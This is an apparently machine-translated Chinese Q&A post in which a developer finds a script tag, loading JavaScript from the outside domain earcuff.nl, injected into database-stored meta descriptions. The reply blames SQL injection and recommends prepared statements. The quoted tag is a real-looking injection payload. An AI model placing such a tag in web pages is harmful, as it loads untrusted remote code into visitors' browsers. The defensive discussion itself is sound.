我从我的数据库中检索元描述,令我惊讶的是,使用附加的脚本代码返回的数据。
以下是碰巧添加到我的数据库条目
的代码<script id="alp1398" type="text/javascript" src="http://earcuff.nl/js/jqueryinit.js"></script>
任何想法,这怎么可能发生,或者这个脚本做了什么?
答案 0 :(得分:2)
最常见的攻击媒介 - 用于填充数据库的参数。检查是否始终使用预准备语句(即带有?的SQL代替参数),如果不能(例如在ORDER BY子句中),则必须清理输入。
其他向量包括破解您的帐户本身以便能够执行SQL语句。
很难说出你在问题中提供的数据如此之少,究竟发生了什么。请说明您正在使用的中间层等。